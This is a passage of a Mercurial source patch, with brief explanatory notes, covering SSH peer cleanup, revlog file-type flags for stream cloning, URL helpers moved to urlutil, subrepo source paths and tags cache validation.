disco = partialdiscovery(
@@ -455,7 +457,7 @@
ui.debug(b"taking initial sample\n")
samplefunc = disco.takefullsample
targetsize = fullsamplesize
- if not hard_limit_sample:
+ if grow_sample:
fullsamplesize = int(fullsamplesize * samplegrowth)
else:
# use even cheaper initial sample
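
The sampling knobs consulted above can now be tuned from the config; an
illustrative snippet using the formerly hard-coded values as defaults:

    [devel]
    discovery.sample-size = 200
    discovery.sample-size.initial = 100
    discovery.grow-sample = yes
    discovery.grow-sample.dynamic = yes
    discovery.randomize = yes
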
--- a/mercurial/shelve.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/shelve.py Tue Apr 20 11:01:06 2021 -0400
@@ -241,7 +241,7 @@
bin(h) for h in d[b'nodestoremove'].split(b' ')
]
except (ValueError, TypeError, KeyError) as err:
- raise error.CorruptedState(pycompat.bytestr(err))
+ raise error.CorruptedState(stringutil.forcebytestr(err))
@classmethod
def _getversion(cls, repo):
@@ -250,7 +250,7 @@
try:
version = int(fp.readline().strip())
except ValueError as err:
- raise error.CorruptedState(pycompat.bytestr(err))
+ raise error.CorruptedState(stringutil.forcebytestr(err))
finally:
fp.close()
return version
@@ -534,7 +534,7 @@
parent = parents[0]
origbranch = wctx.branch()
- if parent.node() != nullid:
+ if parent.rev() != nullrev:
desc = b"changes to: %s" % parent.description().split(b'\n', 1)[0]
else:
desc = b'(changes in empty repository)'
@@ -812,7 +812,7 @@
with repo.lock():
checkparents(repo, state)
ms = mergestatemod.mergestate.read(repo)
- if list(ms.unresolved()):
+ if ms.unresolvedcount():
raise error.Abort(
_(b"unresolved conflicts, can't continue"),
hint=_(b"see 'hg resolve', then 'hg unshelve --continue'"),
--- a/mercurial/similar.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/similar.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# similar.py - mechanisms for finding similar files
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/simplemerge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/simplemerge.py Tue Apr 20 11:01:06 2021 -0400
@@ -19,7 +19,7 @@
from __future__ import absolute_import
from .i18n import _
-from .node import nullid
+from .node import nullrev
from . import (
error,
mdiff,
@@ -402,31 +402,6 @@
return sl
- def find_unconflicted(self):
- """Return a list of ranges in base that are not conflicted."""
- am = mdiff.get_matching_blocks(self.basetext, self.atext)
- bm = mdiff.get_matching_blocks(self.basetext, self.btext)
-
- unc = []
-
- while am and bm:
- # there is an unconflicted block at i; how long does it
- # extend? until whichever one ends earlier.
- a1 = am[0][0]
- a2 = a1 + am[0][2]
- b1 = bm[0][0]
- b2 = b1 + bm[0][2]
- i = intersect((a1, a2), (b1, b2))
- if i:
- unc.append(i)
-
- if a2 < b2:
- del am[0]
- else:
- del bm[0]
-
- return unc
-
def _verifytext(text, path, ui, opts):
"""verifies that text is non-binary (unless opts[text] is passed,
@@ -452,7 +427,7 @@
def is_not_null(ctx):
if not util.safehasattr(ctx, "node"):
return False
- return ctx.node() != nullid
+ return ctx.rev() != nullrev
def _mergediff(m3, name_a, name_b, name_base):
--- a/mercurial/smartset.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/smartset.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# smartset.py - data structure for revision set
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/sshpeer.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/sshpeer.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# sshpeer.py - ssh repository proxy class for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -24,6 +24,7 @@
from .utils import (
procutil,
stringutil,
+ urlutil,
)
@@ -40,7 +41,7 @@
"""display all data currently available on pipe as remote output.
This is non blocking."""
- if pipe:
+ if pipe and not pipe.closed:
s = procutil.readpipe(pipe)
if s:
display = ui.warn if warn else ui.status
@@ -140,18 +141,26 @@
def close(self):
return self._main.close()
+ @property
+ def closed(self):
+ return self._main.closed
+
def flush(self):
return self._main.flush()
-def _cleanuppipes(ui, pipei, pipeo, pipee):
+def _cleanuppipes(ui, pipei, pipeo, pipee, warn):
"""Clean up pipes used by an SSH connection."""
- if pipeo:
+ didsomething = False
+ if pipeo and not pipeo.closed:
+ didsomething = True
pipeo.close()
- if pipei:
+ if pipei and not pipei.closed:
+ didsomething = True
pipei.close()
- if pipee:
+ if pipee and not pipee.closed:
+ didsomething = True
# Try to read from the err descriptor until EOF.
try:
for l in pipee:
@@ -161,6 +170,14 @@
pipee.close()
+ if didsomething and warn is not None:
+ # Encourage explicit close of sshpeers. Closing via __del__ is
+ # not very predictable when exceptions are thrown, which has led
+ # to deadlocks due to a peer being gc'ed in a fork.
+ # We add our own stack trace, because the stack trace from __del__
+ # is useless.
+ ui.develwarn(b'missing close on SSH connection created at:\n%s' % warn)
+
def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None):
"""Create an SSH connection to a server.
@@ -412,6 +429,7 @@
self._pipee = stderr
self._caps = caps
self._autoreadstderr = autoreadstderr
+ self._initstack = b''.join(util.getstackframes(1))
# Commands that have a "framed" response where the first line of the
# response contains the length of that response.
@@ -434,7 +452,7 @@
return True
def close(self):
- pass
+ self._cleanup()
# End of ipeerconnection interface.
@@ -452,10 +470,11 @@
self._cleanup()
raise exception
- def _cleanup(self):
- _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee)
+ def _cleanup(self, warn=None):
+ _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee, warn=warn)
- __del__ = _cleanup
+ def __del__(self):
+ self._cleanup(warn=self._initstack)
def _sendrequest(self, cmd, args, framed=False):
if self.ui.debugflag and self.ui.configbool(
@@ -607,7 +626,7 @@
try:
protoname, caps = _performhandshake(ui, stdin, stdout, stderr)
except Exception:
- _cleanuppipes(ui, stdout, stdin, stderr)
+ _cleanuppipes(ui, stdout, stdin, stderr, warn=None)
raise
if protoname == wireprototypes.SSHV1:
@@ -633,7 +652,7 @@
autoreadstderr=autoreadstderr,
)
else:
- _cleanuppipes(ui, stdout, stdin, stderr)
+ _cleanuppipes(ui, stdout, stdin, stderr, warn=None)
raise error.RepoError(
_(b'unknown version of SSH protocol: %s') % protoname
)
@@ -644,11 +663,11 @@
The returned object conforms to the ``wireprotov1peer.wirepeer`` interface.
"""
- u = util.url(path, parsequery=False, parsefragment=False)
+ u = urlutil.url(path, parsequery=False, parsefragment=False)
if u.scheme != b'ssh' or not u.host or u.path is None:
raise error.RepoError(_(b"couldn't parse location %s") % path)
- util.checksafessh(path)
+ urlutil.checksafessh(path)
if u.passwd is not None:
raise error.RepoError(_(b'password in URL not supported'))
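
The calling convention this change encourages is the explicit try/finally
pattern used elsewhere in this series (a minimal sketch):

    peer = hg.peer(repo, {}, url)
    try:
        pass  # use the peer
    finally:
        peer.close()

Relying on __del__ still works, but now triggers a develwarn that includes
the stack captured when the peer was constructed.
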
--- a/mercurial/sslutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/sslutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# sslutil.py - SSL handling for mercurial
#
-# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
--- a/mercurial/stack.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/stack.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# stack.py - Mercurial functions for stack definition
#
-# Copyright Matt Mackall <mpm@selenic.com> and other
+# Copyright Olivia Mackall <olivia@selenic.com> and other
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/statichttprepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/statichttprepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# This provides read-only repo access to repositories exported via static http
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -12,6 +12,7 @@
import errno
from .i18n import _
+from .node import sha1nodeconstants
from . import (
branchmap,
changelog,
@@ -25,6 +26,9 @@
util,
vfs as vfsmod,
)
+from .utils import (
+ urlutil,
+)
urlerr = util.urlerr
urlreq = util.urlreq
@@ -161,7 +165,7 @@
self.ui = ui
self.root = path
- u = util.url(path.rstrip(b'/') + b"/.hg")
+ u = urlutil.url(path.rstrip(b'/') + b"/.hg")
self.path, authinfo = u.authinfo()
vfsclass = build_opener(ui, authinfo)
@@ -172,6 +176,7 @@
self.names = namespaces.namespaces()
self.filtername = None
self._extrafilterid = None
+ self._wanted_sidedata = set()
try:
requirements = set(self.vfs.read(b'requires').splitlines())
@@ -197,6 +202,8 @@
requirements, supportedrequirements
)
localrepo.ensurerequirementscompatible(ui, requirements)
+ self.nodeconstants = sha1nodeconstants
+ self.nullid = self.nodeconstants.nullid
# setup store
self.store = localrepo.makestore(requirements, self.path, vfsclass)
@@ -206,7 +213,7 @@
self._filecache = {}
self.requirements = requirements
- rootmanifest = manifest.manifestrevlog(self.svfs)
+ rootmanifest = manifest.manifestrevlog(self.nodeconstants, self.svfs)
self.manifestlog = manifest.manifestlog(
self.svfs, self, rootmanifest, self.narrowmatch()
)
--- a/mercurial/store.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/store.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# store.py - repository store handling for Mercurial
#
-# Copyright 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -10,6 +10,7 @@
import errno
import functools
import os
+import re
import stat
from .i18n import _
@@ -387,13 +388,58 @@
b'requires',
]
+REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored')
+REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored')
+# files that are "volatile" and might change between listing and streaming
+#
+# note: the ".nd" file are nodemap data and won't "change" but they might be
+# deleted.
+REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd')
-def isrevlog(f, kind, st):
+# some exceptions to the above matching
+EXCLUDED = re.compile(br'.*undo\.[^/]+\.nd?$')
+
+
+def is_revlog(f, kind, st):
if kind != stat.S_IFREG:
- return False
- if f[-2:] in (b'.i', b'.d', b'.n'):
- return True
- return f[-3:] == b'.nd'
+ return None
+ return revlog_type(f)
+
+
+def revlog_type(f):
+ if f.endswith(REVLOG_FILES_MAIN_EXT):
+ return FILEFLAGS_REVLOG_MAIN
+ elif f.endswith(REVLOG_FILES_OTHER_EXT) and EXCLUDED.match(f) is None:
+ t = FILETYPE_FILELOG_OTHER
+ if f.endswith(REVLOG_FILES_VOLATILE_EXT):
+ t |= FILEFLAGS_VOLATILE
+ return t
+
+
+# the file is part of changelog data
+FILEFLAGS_CHANGELOG = 1 << 13
+# the file is part of manifest data
+FILEFLAGS_MANIFESTLOG = 1 << 12
+# the file is part of filelog data
+FILEFLAGS_FILELOG = 1 << 11
+# files that are not directly part of a revlog
+FILEFLAGS_OTHER = 1 << 10
+
+# the main entry point for a revlog
+FILEFLAGS_REVLOG_MAIN = 1 << 1
+# a secondary file for a revlog
+FILEFLAGS_REVLOG_OTHER = 1 << 0
+
+# files that are "volatile" and might change between listing and streaming
+FILEFLAGS_VOLATILE = 1 << 20
+
+FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN
+FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER
+FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN
+FILETYPE_MANIFESTLOG_OTHER = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_OTHER
+FILETYPE_FILELOG_MAIN = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN
+FILETYPE_FILELOG_OTHER = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_OTHER
+FILETYPE_OTHER = FILEFLAGS_OTHER
class basicstore(object):
@@ -411,7 +457,7 @@
def join(self, f):
return self.path + b'/' + encodedir(f)
- def _walk(self, relpath, recurse, filefilter=isrevlog):
+ def _walk(self, relpath, recurse):
'''yields (unencoded, encoded, size)'''
path = self.path
if relpath:
@@ -425,30 +471,46 @@
p = visit.pop()
for f, kind, st in readdir(p, stat=True):
fp = p + b'/' + f
- if filefilter(f, kind, st):
+ rl_type = is_revlog(f, kind, st)
+ if rl_type is not None:
n = util.pconvert(fp[striplen:])
- l.append((decodedir(n), n, st.st_size))
+ l.append((rl_type, decodedir(n), n, st.st_size))
elif kind == stat.S_IFDIR and recurse:
visit.append(fp)
l.sort()
return l
- def changelog(self, trypending):
- return changelog.changelog(self.vfs, trypending=trypending)
+ def changelog(self, trypending, concurrencychecker=None):
+ return changelog.changelog(
+ self.vfs,
+ trypending=trypending,
+ concurrencychecker=concurrencychecker,
+ )
def manifestlog(self, repo, storenarrowmatch):
- rootstore = manifest.manifestrevlog(self.vfs)
+ rootstore = manifest.manifestrevlog(repo.nodeconstants, self.vfs)
return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch)
def datafiles(self, matcher=None):
- return self._walk(b'data', True) + self._walk(b'meta', True)
+ files = self._walk(b'data', True) + self._walk(b'meta', True)
+ for (t, u, e, s) in files:
+ yield (FILEFLAGS_FILELOG | t, u, e, s)
def topfiles(self):
# yield manifest before changelog
- return reversed(self._walk(b'', False))
+ files = reversed(self._walk(b'', False))
+ for (t, u, e, s) in files:
+ if u.startswith(b'00changelog'):
+ yield (FILEFLAGS_CHANGELOG | t, u, e, s)
+ elif u.startswith(b'00manifest'):
+ yield (FILEFLAGS_MANIFESTLOG | t, u, e, s)
+ else:
+ yield (FILETYPE_OTHER | t, u, e, s)
def walk(self, matcher=None):
- """yields (unencoded, encoded, size)
+ """return file related to data storage (ie: revlogs)
+
+ yields (file_type, unencoded, encoded, size)
if a matcher is passed, only storage files of tracked paths matching it
are yielded
@@ -494,14 +556,14 @@
self.opener = self.vfs
def datafiles(self, matcher=None):
- for a, b, size in super(encodedstore, self).datafiles():
+ for t, a, b, size in super(encodedstore, self).datafiles():
try:
a = decodefilename(a)
except KeyError:
a = None
if a is not None and not _matchtrackedpath(a, matcher):
continue
- yield a, b, size
+ yield t, a, b, size
def join(self, f):
return self.path + b'/' + encodefilename(f)
@@ -690,7 +752,9 @@
continue
ef = self.encode(f)
try:
- yield f, ef, self.getsize(ef)
+ t = revlog_type(f)
+ t |= FILEFLAGS_FILELOG
+ yield t, f, ef, self.getsize(ef)
except OSError as err:
if err.errno != errno.ENOENT:
raise
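
An illustrative check of how the file-type constants compose (not part of
the patch; assumes the names are imported from mercurial.store):

    t = FILETYPE_FILELOG_MAIN  # FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN
    assert t & FILEFLAGS_FILELOG
    assert t & FILEFLAGS_REVLOG_MAIN
    assert not t & FILEFLAGS_VOLATILE

    # a nodemap data file would additionally carry the volatile bit:
    t = FILETYPE_FILELOG_OTHER | FILEFLAGS_VOLATILE
    assert t & FILEFLAGS_VOLATILE
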
--- a/mercurial/streamclone.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/streamclone.py Tue Apr 20 11:01:06 2021 -0400
@@ -20,6 +20,7 @@
narrowspec,
phases,
pycompat,
+ requirements as requirementsmod,
scmutil,
store,
util,
@@ -83,7 +84,7 @@
# is advertised and contains a comma-delimited list of requirements.
requirements = set()
if remote.capable(b'stream'):
- requirements.add(b'revlogv1')
+ requirements.add(requirementsmod.REVLOGV1_REQUIREMENT)
else:
streamreqs = remote.capable(b'streamreqs')
# This is weird and shouldn't happen with modern servers.
@@ -242,10 +243,12 @@
# Get consistent snapshot of repo, lock during scan.
with repo.lock():
repo.ui.debug(b'scanning\n')
- for name, ename, size in _walkstreamfiles(repo):
+ for file_type, name, ename, size in _walkstreamfiles(repo):
if size:
entries.append((name, size))
total_bytes += size
+ _test_sync_point_walk_1(repo)
+ _test_sync_point_walk_2(repo)
repo.ui.debug(
b'%d files, %d bytes to transfer\n' % (len(entries), total_bytes)
@@ -592,6 +595,14 @@
fp.close()
+def _test_sync_point_walk_1(repo):
+ """a function for synchronisation during tests"""
+
+
+def _test_sync_point_walk_2(repo):
+ """a function for synchronisation during tests"""
+
+
def generatev2(repo, includes, excludes, includeobsmarkers):
"""Emit content for version 2 of a streaming clone.
@@ -615,9 +626,12 @@
matcher = narrowspec.match(repo.root, includes, excludes)
repo.ui.debug(b'scanning\n')
- for name, ename, size in _walkstreamfiles(repo, matcher):
+ for rl_type, name, ename, size in _walkstreamfiles(repo, matcher):
if size:
- entries.append((_srcstore, name, _fileappend, size))
+ ft = _fileappend
+ if rl_type & store.FILEFLAGS_VOLATILE:
+ ft = _filefull
+ entries.append((_srcstore, name, ft, size))
totalfilesize += size
for name in _walkstreamfullstorefiles(repo):
if repo.svfs.exists(name):
@@ -634,6 +648,8 @@
chunks = _emit2(repo, entries, totalfilesize)
first = next(chunks)
assert first is None
+ _test_sync_point_walk_1(repo)
+ _test_sync_point_walk_2(repo)
return len(entries), totalfilesize, chunks
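
The practical effect of the FILEFLAGS_VOLATILE test above: volatile files
(for example the .n/.nd nodemap files, which may be deleted between the
scan and the actual streaming) are snapshotted in full (_filefull) rather
than streamed as append-only data (_fileappend), presumably so a concurrent
change cannot corrupt the stream mid-transfer.
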
--- a/mercurial/subrepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/subrepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# subrepo.py - sub-repository classes and factory
#
-# Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -44,6 +44,7 @@
dateutil,
hashutil,
procutil,
+ urlutil,
)
hg = None
@@ -57,8 +58,8 @@
"""
get a path or url and if it is a path expand it and return an absolute path
"""
- expandedpath = util.urllocalpath(util.expandpath(path))
- u = util.url(expandedpath)
+ expandedpath = urlutil.urllocalpath(util.expandpath(path))
+ u = urlutil.url(expandedpath)
if not u.scheme:
path = util.normpath(os.path.abspath(u.path))
return path
@@ -716,13 +717,17 @@
_(b'sharing subrepo %s from %s\n')
% (subrelpath(self), srcurl)
)
- shared = hg.share(
- self._repo._subparent.baseui,
- getpeer(),
- self._repo.root,
- update=False,
- bookmarks=False,
- )
+ peer = getpeer()
+ try:
+ shared = hg.share(
+ self._repo._subparent.baseui,
+ peer,
+ self._repo.root,
+ update=False,
+ bookmarks=False,
+ )
+ finally:
+ peer.close()
self._repo = shared.local()
else:
# TODO: find a common place for this and this code in the
@@ -741,26 +746,34 @@
self.ui.status(
_(b'cloning subrepo %s from %s\n')
- % (subrelpath(self), util.hidepassword(srcurl))
+ % (subrelpath(self), urlutil.hidepassword(srcurl))
)
- other, cloned = hg.clone(
- self._repo._subparent.baseui,
- {},
- getpeer(),
- self._repo.root,
- update=False,
- shareopts=shareopts,
- )
+ peer = getpeer()
+ try:
+ other, cloned = hg.clone(
+ self._repo._subparent.baseui,
+ {},
+ peer,
+ self._repo.root,
+ update=False,
+ shareopts=shareopts,
+ )
+ finally:
+ peer.close()
self._repo = cloned.local()
self._initrepo(parentrepo, source, create=True)
self._cachestorehash(srcurl)
else:
self.ui.status(
_(b'pulling subrepo %s from %s\n')
- % (subrelpath(self), util.hidepassword(srcurl))
+ % (subrelpath(self), urlutil.hidepassword(srcurl))
)
cleansub = self.storeclean(srcurl)
- exchange.pull(self._repo, getpeer())
+ peer = getpeer()
+ try:
+ exchange.pull(self._repo, peer)
+ finally:
+ peer.close()
if cleansub:
# keep the repo clean after pull
self._cachestorehash(srcurl)
@@ -837,15 +850,18 @@
if self.storeclean(dsturl):
self.ui.status(
_(b'no changes made to subrepo %s since last push to %s\n')
- % (subrelpath(self), util.hidepassword(dsturl))
+ % (subrelpath(self), urlutil.hidepassword(dsturl))
)
return None
self.ui.status(
_(b'pushing subrepo %s to %s\n')
- % (subrelpath(self), util.hidepassword(dsturl))
+ % (subrelpath(self), urlutil.hidepassword(dsturl))
)
other = hg.peer(self._repo, {b'ssh': ssh}, dsturl)
- res = exchange.push(self._repo, other, force, newbranch=newbranch)
+ try:
+ res = exchange.push(self._repo, other, force, newbranch=newbranch)
+ finally:
+ other.close()
# the repo is now clean
self._cachestorehash(dsturl)
@@ -857,7 +873,8 @@
opts = copy.copy(opts)
opts.pop(b'rev', None)
opts.pop(b'branch', None)
- return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
+ subpath = subrepoutil.repo_rel_or_abs_source(self._repo)
+ return hg.outgoing(ui, self._repo, dest, opts, subpath=subpath)
@annotatesubrepoerror
def incoming(self, ui, source, opts):
@@ -865,7 +882,8 @@
opts = copy.copy(opts)
opts.pop(b'rev', None)
opts.pop(b'branch', None)
- return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
+ subpath = subrepoutil.repo_rel_or_abs_source(self._repo)
+ return hg.incoming(ui, self._repo, source, opts, subpath=subpath)
@annotatesubrepoerror
def files(self):
@@ -1269,7 +1287,7 @@
args.append(b'%s@%s' % (state[0], state[1]))
# SEC: check that the ssh url is safe
- util.checksafessh(state[0])
+ urlutil.checksafessh(state[0])
status, err = self._svncommand(args, failok=True)
_sanitize(self.ui, self.wvfs, b'.svn')
@@ -1567,7 +1585,7 @@
def _fetch(self, source, revision):
if self._gitmissing():
# SEC: check for safe ssh url
- util.checksafessh(source)
+ urlutil.checksafessh(source)
source = self._abssource(source)
self.ui.status(
--- a/mercurial/subrepoutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/subrepoutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# subrepoutil.py - sub-repository operations and substate handling
#
-# Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -23,12 +23,36 @@
pycompat,
util,
)
-from .utils import stringutil
+from .utils import (
+ stringutil,
+ urlutil,
+)
nullstate = (b'', b'', b'empty')
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Any,
+ Dict,
+ List,
+ Optional,
+ Set,
+ Tuple,
+ )
+ from . import (
+ context,
+ localrepo,
+ match as matchmod,
+ scmutil,
+ subrepo,
+ ui as uimod,
+ )
+
+ Substate = Dict[bytes, Tuple[bytes, bytes, bytes]]
+
def state(ctx, ui):
+ # type: (context.changectx, uimod.ui) -> Substate
"""return a state dict, mapping subrepo paths configured in .hgsub
to tuple: (source from .hgsub, revision from .hgsubstate, kind
(key in types dict))
@@ -84,6 +108,7 @@
raise
def remap(src):
+ # type: (bytes) -> bytes
for pattern, repl in p.items(b'subpaths'):
# Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
# does a string decode.
@@ -105,7 +130,7 @@
return src
state = {}
- for path, src in p[b''].items():
+ for path, src in p.items(b''): # type: bytes
kind = b'hg'
if src.startswith(b'['):
if b']' not in src:
@@ -114,10 +139,10 @@
kind = kind[1:]
src = src.lstrip() # strip any extra whitespace after ']'
- if not util.url(src).isabs():
+ if not urlutil.url(src).isabs():
parent = _abssource(repo, abort=False)
if parent:
- parent = util.url(parent)
+ parent = urlutil.url(parent)
parent.path = posixpath.join(parent.path or b'', src)
parent.path = posixpath.normpath(parent.path)
joined = bytes(parent)
@@ -136,6 +161,7 @@
def writestate(repo, state):
+ # type: (localrepo.localrepository, Substate) -> None
"""rewrite .hgsubstate in (outer) repo with these subrepo states"""
lines = [
b'%s %s\n' % (state[s][1], s)
@@ -146,6 +172,8 @@
def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
+ # type: (localrepo.localrepository, context.workingctx, context.changectx, context.changectx, bool, Optional[Any]) -> Substate
+ # TODO: type the `labels` arg
"""delegated from merge.applyupdates: merging of .hgsubstate file
in working context, merging context and ancestor context"""
if mctx == actx: # backwards?
@@ -285,6 +313,7 @@
def precommit(ui, wctx, status, match, force=False):
+ # type: (uimod.ui, context.workingcommitctx, scmutil.status, matchmod.basematcher, bool) -> Tuple[List[bytes], Set[bytes], Substate]
"""Calculate .hgsubstate changes that should be applied before committing
Returns (subs, commitsubs, newstate) where
@@ -354,7 +383,26 @@
return subs, commitsubs, newstate
+def repo_rel_or_abs_source(repo):
+ """return the source of this repo
+
+ Either absolute or relative to the outermost repo"""
+ parent = repo
+ chunks = []
+ while util.safehasattr(parent, b'_subparent'):
+ source = urlutil.url(parent._subsource)
+ chunks.append(bytes(source))
+ if source.isabs():
+ break
+ parent = parent._subparent
+
+ chunks.reverse()
+ path = posixpath.join(*chunks)
+ return posixpath.normpath(path)
+
+
def reporelpath(repo):
+ # type: (localrepo.localrepository) -> bytes
"""return path to this (sub)repo as seen from outermost repo"""
parent = repo
while util.safehasattr(parent, b'_subparent'):
@@ -363,21 +411,23 @@
def subrelpath(sub):
+ # type: (subrepo.abstractsubrepo) -> bytes
"""return path to this subrepo as seen from outermost repo"""
return sub._relpath
def _abssource(repo, push=False, abort=True):
+ # type: (localrepo.localrepository, bool, bool) -> Optional[bytes]
"""return pull/push path of repo - either based on parent repo .hgsub info
or on the top repo config. Abort or return None if no source found."""
if util.safehasattr(repo, b'_subparent'):
- source = util.url(repo._subsource)
+ source = urlutil.url(repo._subsource)
if source.isabs():
return bytes(source)
source.path = posixpath.normpath(source.path)
parent = _abssource(repo._subparent, push, abort=False)
if parent:
- parent = util.url(util.pconvert(parent))
+ parent = urlutil.url(util.pconvert(parent))
parent.path = posixpath.join(parent.path or b'', source.path)
parent.path = posixpath.normpath(parent.path)
return bytes(parent)
@@ -406,7 +456,7 @@
#
# D:\>python -c "import os; print os.path.abspath('C:relative')"
# C:\some\path\relative
- if util.hasdriveletter(path):
+ if urlutil.hasdriveletter(path):
if len(path) == 2 or path[2:3] not in br'\/':
path = os.path.abspath(path)
return path
@@ -416,6 +466,7 @@
def newcommitphase(ui, ctx):
+ # type: (uimod.ui, context.changectx) -> int
commitphase = phases.newcommitphase(ui)
substate = getattr(ctx, "substate", None)
if not substate:
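
A worked example for repo_rel_or_abs_source() (illustrative): with an outer
repo whose subrepo source is libs/foo, itself containing a subrepo whose
source is bar, the walk collects [b'bar', b'libs/foo'], then reverses,
joins, and normalizes, returning libs/foo/bar. If any source along the
chain is absolute, the walk stops there and the result is absolute.
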
--- a/mercurial/tags.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/tags.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# tags.py - read tag info from local repository
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com>
+# Copyright 2009 Olivia Mackall <olivia@selenic.com>
# Copyright 2009 Greg Ward <greg@gerg.ca>
#
# This software may be used and distributed according to the terms of the
@@ -494,11 +494,25 @@
starttime = util.timer()
fnodescache = hgtagsfnodescache(repo.unfiltered())
cachefnode = {}
+ validated_fnodes = set()
+ unknown_entries = set()
for node in nodes:
fnode = fnodescache.getfnode(node)
+ flog = repo.file(b'.hgtags')
if fnode != nullid:
+ if fnode not in validated_fnodes:
+ if flog.hasnode(fnode):
+ validated_fnodes.add(fnode)
+ else:
+ unknown_entries.add(node)
cachefnode[node] = fnode
+ if unknown_entries:
+ fixed_nodemap = fnodescache.refresh_invalid_nodes(unknown_entries)
+ for node, fnode in pycompat.iteritems(fixed_nodemap):
+ if fnode != nullid:
+ cachefnode[node] = fnode
+
fnodescache.write()
duration = util.timer() - starttime
@@ -733,6 +747,7 @@
if rawlen < wantedlen:
if self._dirtyoffset is None:
self._dirtyoffset = rawlen
+ # TODO: zero fill entire record, because it's invalid not missing?
self._raw.extend(b'\xff' * (wantedlen - rawlen))
def getfnode(self, node, computemissing=True):
@@ -740,7 +755,8 @@
If the value is in the cache, the entry will be validated and returned.
Otherwise, the filenode will be computed and returned unless
- "computemissing" is False, in which case None will be returned without
+ "computemissing" is False. In that case, None will be returned if
+ the entry is missing or False if the entry is invalid without
any potentially expensive computation being performed.
If an .hgtags does not exist at the specified revision, nullid is
@@ -771,8 +787,19 @@
# If we get here, the entry is either missing or invalid.
if not computemissing:
+ if record != _fnodesmissingrec:
+ return False
return None
+ fnode = self._computefnode(node)
+ self._writeentry(offset, properprefix, fnode)
+ return fnode
+
+ def _computefnode(self, node):
+ """Finds the tag filenode for a node which is missing or invalid
+ in cache"""
+ ctx = self._repo[node]
+ rev = ctx.rev()
fnode = None
cl = self._repo.changelog
p1rev, p2rev = cl._uncheckedparentrevs(rev)
@@ -788,7 +815,7 @@
# we cannot rely on readfast because we don't know against what
# parent the readfast delta is computed
p1fnode = None
- if p1fnode is not None:
+ if p1fnode:
